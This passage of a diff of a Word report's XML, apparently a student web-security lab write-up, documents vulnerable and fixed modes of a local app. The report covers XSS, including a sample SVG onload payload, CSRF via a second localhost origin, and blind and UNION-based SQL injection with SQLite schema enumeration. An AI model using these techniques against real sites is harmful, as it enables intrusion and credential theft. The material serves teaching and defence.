+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Page 46 of 46</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -8309,7 +9271,7 @@
     <w:link w:val="TitleChar"/>
     <w:uiPriority w:val="10"/>
     <w:qFormat/>
-    <w:rsid w:val="001B22A9"/>
+    <w:rsid w:val="00DA4882"/>
     <w:pPr>
       <w:spacing w:before="240" w:after="60"/>
       <w:jc w:val="center"/>
@@ -8329,7 +9291,7 @@
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="Title"/>
     <w:uiPriority w:val="10"/>
-    <w:rsid w:val="001B22A9"/>
+    <w:rsid w:val="00DA4882"/>
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
       <w:b/>

--- a/submission/Part_2_Report.docx
+++ b/submission/Part_2_Report.docx
@@ -212,7 +212,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>GitHub submission URL: https://github.com/ibrahimwarraich101/is-webSecurity. Local Git development commits accompany the project. This report covers Part 2 only; Parts 1 and 3 can be added to the final combined Word submission.</w:t>
+        <w:t xml:space="preserve">GitHub submission URL: https://github.com/ibrahimwarraich101/is-webSecurity/tree/complete-question2. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>The complete-question2 branch contains the updated source and evidence with genuine development commits. Review: https://github.com/ibrahimwarraich101/is-webSecurity/pull/1. This report covers Part 2; Parts 1 and 3 belong in the combined Word submission.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -346,7 +355,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Start the attacker in another terminal: python app.py --attacker. It listens at http://127.0.0.1:8001. Main and attacker servers bind only to loopback. All accounts and extracted credentials are synthetic lab records.</w:t>
+        <w:t>Start the attacker in another terminal: python app.py --attacker. Open</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> http://localhost:8001/vulnerable or http://localhost:8001/safe. Main and attacker servers bind only to loopback. All accounts and extracted credentials are synthetic lab records.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -394,31 +412,49 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Tables: users(id, username, password, email, role); courses(code, title, credits); comments(id, author, body); enrollments(id, reference, user_id, course_code). The populated seed-data.sql creates both databases; safe initialization hashes its passwords before serving requests.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Re-run live HTTP tests: python tests/test_security.py. Browser evidence: install the development-only Playwright package, then node tests/browser_evidence.cjs. tests/build_report.py builds the report from the original PNG images. tests/export_word.ps1 converts its temporary RTF to native DOCX through Microsoft Word. The submitted DOCX is editable and can be merged into the final combined report.</w:t>
+        <w:t>Tables: users(id, username, password, email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>, role); courses(code, title, credits); comments(id, author, body); enrollments(id, reference, user_id, course_code). The populated seed-data.sql creates both databases; safe initialization hashes its passwords before serving requests.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Re-run live HTTP tests: python tests/test_security.py. Browser evidence: install the development-only Playwright package, then node tests/browser_evidence.cjs. tests/build_report.py builds the report from the original PNG images. tests/export_wor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>d.ps1 converts its temporary RTF to native DOCX through Microsoft Word. The submitted DOCX is editable and can be merged into the final combined report.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -552,7 +588,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Stored XSS: discussion input is stored in SQLite with a parameterized INSERT, but the vulnerable output emits its body as raw HTML. A separate guest visitor loads that saved input and executes it. Safe mode encodes the body at output, preserving the original text without executing it.</w:t>
+        <w:t>Stored XSS: discussion input is stored in SQLite with a parameterized INSERT, but the vulnerable output emits its body as raw HTML. A separate guest visitor loads that saved input and executes it. Safe mode encodes the body at output, preser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>ving the original text without executing it.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -600,7 +645,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>CSRF: the vulnerable email update trusts the session cookie without verifying a token or Origin. The external page submits an automatic POST without consent. Safe mode uses a random session-bound token, constant-time comparison, exact Origin validation and explicit SameSite=Lax cookies. The two screenshots after each attack verify the database-backed profile state.</w:t>
+        <w:t xml:space="preserve">CSRF: the vulnerable email update trusts the session cookie without verifying a token or Origin. The external page submits an automatic POST without consent. Safe mode uses a random </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>session-bound token, constant-time comparison, exact Origin validation and explicit SameSite=Lax cookies. The two screenshots after each attack verify the database-backed profile state.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -648,40 +702,49 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Intermediate SQL injection: the enrollment lookup exposes only found or not found. Appending true and false predicates confirms injection; testing the first characte</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>r of the admin password reveals A without printing the password. Safe mode binds the reference as data.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Advanced SQL injection: ORDER BY 3 succeeds and ORDER BY 4 fails, establishing three result columns. UNION queries enumerate the database, tables and users columns before extracting demo credentials. SQLite schema introspection through pragma_database_list, sqlite_master and pragma_table_info is the equivalent of information_schema. Safe mode parameterizes the LIKE value.</w:t>
+        <w:t>Inter</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>mediate SQL injection: the enrollment lookup exposes only found or not found. Appending true and false predicates confirms injection; testing the first character of the admin password reveals A without printing the password. Safe mode binds the reference as data.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Advanced SQL injection: ORDER BY 3 succeeds and ORDER BY 4 fails, establishing three result columns. UNION queries enumerate the database, tables and users columns before extracting demo credentials. SQLite schema intr</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>ospection through pragma_database_list, sqlite_master and pragma_table_info is the equivalent of information_schema. Safe mode parameterizes the LIKE value.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -767,31 +830,49 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>The attacker is http://localhost:8001 and the target is http://localhost:8000. These are different origins on the same site. The attacker page submits a forged email update using the existing browser session, without a token. This genuine CSRF demonstration does not depend on the age of the session cookie. Visit /vulnerable for automatic submission, or /vulnerable?manual=1 to inspect the form before pressing Continue.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>SameSite=Lax does not stop a same-site, cross-origin request. The safe demonstration therefore sends the real authenticated session cookie and receives HTTP 403 from server-side token and Origin validation. The unchanged profile is checked after the attack. The additional cross-site URL http://127.0.0.1:8001 remains available, but its vulnerable success can depend on browser cookie policy; use localhost:8001 for the viva.</w:t>
+        <w:t>The attacker is http://localhost:8001 and the target is http://localhost:8000. These are different origins on the same site. The attacker page submits a forged email update using the existing browser session, wi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>thout a token. This genuine CSRF demonstration does not depend on the age of the session cookie. Visit /vulnerable for automatic submission, or /vulnerable?manual=1 to inspect the form before pressing Continue.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>SameSite=Lax does not stop a same-site, cross-origin request. The safe demonstration therefore sends the real authenticated session cookie and receives HTTP 403 from server-side token and Origin validation. The unchanged profile is checked after the attack. The additiona</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>l cross-site URL http://127.0.0.1:8001 remains available, but its vulnerable success can depend on browser cookie policy; use localhost:8001 for the viva.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -839,16 +920,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>For SQL injection, explain how quotes, comments and UNION alter the query structure. Demonstrate true/false inference, then follow the adva</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>nced chain in order. The final cards contain actual synthetic records queried from SQLite, rather than a scripted success message.</w:t>
+        <w:t>For SQL injection, explain how quotes, comments and UNION alter the query structure. Demonstrate true/false inference, then follow the advanced chain in order. The final cards contain actual synthetic records queried from SQLite, rather than a scripted success message.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -896,16 +968,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>The safe version addresses the assignment attack set. Production use would additionally</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> require HTTPS and Secure cookies, session expiry, rate limiting, access-control policy and operational monitoring.</w:t>
+        <w:t>The safe version addresses the assignment attack set. Production use would additionally require HTTPS and Secure cookies, session expiry, rate limiting, access-control policy and operational monitoring.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1015,16 +1078,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Run python app.py --attacker,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sign in as student at http://localhost:8000/vulnerable/login, then visit http://localhost:8001/vulnerable. The external document contains this complete attack payload:</w:t>
+        <w:t>Run python app.py --attacker, sign in as student at http://localhost:8000/vulnerable/login, then visit http://localhost:8001/vulnerable. The external document contains this complete attack payload:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1325,7 +1379,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="08FC9955">
+        <w:pict w14:anchorId="48FFCB5B">
           <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
             <v:stroke joinstyle="miter"/>
             <v:formulas>
@@ -1409,7 +1463,6 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Vulnerable Version XSS Reflected</w:t>
       </w:r>
     </w:p>
@@ -1531,7 +1584,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="5D9311F1">
+        <w:pict w14:anchorId="18293502">
           <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId5" o:title=""/>
           </v:shape>
@@ -1596,7 +1649,6 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Vulnerable Version XSS DOM Based</w:t>
       </w:r>
     </w:p>
@@ -1718,7 +1770,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="6E243000">
+        <w:pict w14:anchorId="7FE3441F">
           <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId6" o:title=""/>
           </v:shape>
@@ -1783,7 +1835,6 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Vulnerable Version XSS Stored</w:t>
       </w:r>
     </w:p>
@@ -1905,7 +1956,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="7D526DF3">
+        <w:pict w14:anchorId="4CB95485">
           <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:495pt;height:390pt">
             <v:imagedata r:id="rId7" o:title=""/>
           </v:shape>
@@ -1970,7 +2021,6 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Vulnerable Version Csrf Before</w:t>
       </w:r>
     </w:p>
@@ -2092,7 +2142,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="5E511084">
+        <w:pict w14:anchorId="7CEC4482">
           <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId8" o:title=""/>
           </v:shape>
@@ -2157,7 +2207,6 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Vulnerable Version Csrf Setup</w:t>
       </w:r>
     </w:p>
@@ -2279,7 +2328,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="66F380ED">
+        <w:pict w14:anchorId="0F0D3966">
           <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId9" o:title=""/>
           </v:shape>
@@ -2344,7 +2393,6 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Vulnerable Version Csrf Response</w:t>
       </w:r>
     </w:p>
@@ -2466,7 +2514,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="26A5F04C">
+        <w:pict w14:anchorId="095FAF70">
           <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId10" o:title=""/>
           </v:shape>
@@ -2531,8 +2579,18 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Version Csrf After</w:t>
+        <w:t>Vulnerable V</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ersion Csrf After</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2653,7 +2711,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="4700522D">
+        <w:pict w14:anchorId="36DA03B3">
           <v:shape id="_x0000_i1032" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId11" o:title=""/>
           </v:shape>
@@ -2839,7 +2897,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="725D5585">
+        <w:pict w14:anchorId="64CCC3B7">
           <v:shape id="_x0000_i1033" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId12" o:title=""/>
           </v:shape>
@@ -3025,7 +3083,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="01A6D2F8">
+        <w:pict w14:anchorId="1E7D2D95">
           <v:shape id="_x0000_i1034" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId13" o:title=""/>
           </v:shape>
@@ -3211,7 +3269,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="77F82D1C">
+        <w:pict w14:anchorId="434A6866">
           <v:shape id="_x0000_i1035" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId14" o:title=""/>
           </v:shape>
@@ -3397,7 +3455,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="06E79425">
+        <w:pict w14:anchorId="1893DE89">
           <v:shape id="_x0000_i1036" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId15" o:title=""/>
           </v:shape>
@@ -3534,7 +3592,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-11T16:08:04.984Z. The screenshot footer displays PKT.</w:t>
+        <w:t>Capture timesta</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>mp UTC: 2026-10-11T16:08:04.984Z. The screenshot footer displays PKT.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3583,7 +3650,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="7D2B0FF4">
+        <w:pict w14:anchorId="7BCCDA33">
           <v:shape id="_x0000_i1037" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId16" o:title=""/>
           </v:shape>
@@ -3769,7 +3836,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="780FEC8A">
+        <w:pict w14:anchorId="7CDBCBB6">
           <v:shape id="_x0000_i1038" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId17" o:title=""/>
           </v:shape>
@@ -3955,7 +4022,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="15F24F5D">
+        <w:pict w14:anchorId="1723089F">
           <v:shape id="_x0000_i1039" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId18" o:title=""/>
           </v:shape>
@@ -4141,7 +4208,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="0BDB658D">
+        <w:pict w14:anchorId="360E66D9">
           <v:shape id="_x0000_i1040" type="#_x0000_t75" style="width:495pt;height:361.5pt">
             <v:imagedata r:id="rId19" o:title=""/>
           </v:shape>
@@ -4327,7 +4394,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="7AD37FA0">
+        <w:pict w14:anchorId="618C5751">
           <v:shape id="_x0000_i1041" type="#_x0000_t75" style="width:427.5pt;height:395.25pt">
             <v:imagedata r:id="rId20" o:title=""/>
           </v:shape>
@@ -4464,7 +4531,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-11T16:08:08.182Z. The screenshot footer displays PKT.</w:t>
+        <w:t>Capture ti</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>mestamp UTC: 2026-10-11T16:08:08.182Z. The screenshot footer displays PKT.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4513,7 +4589,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="1ED4202D">
+        <w:pict w14:anchorId="5FFE9903">
           <v:shape id="_x0000_i1042" type="#_x0000_t75" style="width:388.5pt;height:395.25pt">
             <v:imagedata r:id="rId21" o:title=""/>
           </v:shape>
@@ -4699,7 +4775,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="4AE32C59">
+        <w:pict w14:anchorId="4540F915">
           <v:shape id="_x0000_i1043" type="#_x0000_t75" style="width:495pt;height:361.5pt">
             <v:imagedata r:id="rId22" o:title=""/>
           </v:shape>
@@ -4885,7 +4961,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="08292F8C">
+        <w:pict w14:anchorId="68A0712B">
           <v:shape id="_x0000_i1044" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId23" o:title=""/>
           </v:shape>
@@ -5047,7 +5123,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="2F11BFD7">
+        <w:pict w14:anchorId="6E2276F4">
           <v:shape id="_x0000_i1045" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId24" o:title=""/>
           </v:shape>
@@ -5136,16 +5212,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Input or attack setup: &lt;svg onload="document.getElementById(`se</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>arch-summary`).textContent=`REFLECTED XSS EXECUTED`"&gt;&lt;/svg&gt;</w:t>
+        <w:t>Input or attack setup: &lt;svg onload="document.getElementById(`search-summary`).textContent=`REFLECTED XSS EXECUTED`"&gt;&lt;/svg&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5242,7 +5309,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="56F95480">
+        <w:pict w14:anchorId="3B3A63E7">
           <v:shape id="_x0000_i1046" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId25" o:title=""/>
           </v:shape>
@@ -5428,7 +5495,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="362B9196">
+        <w:pict w14:anchorId="4A177919">
           <v:shape id="_x0000_i1047" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId26" o:title=""/>
           </v:shape>
@@ -5614,7 +5681,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="407CEE3A">
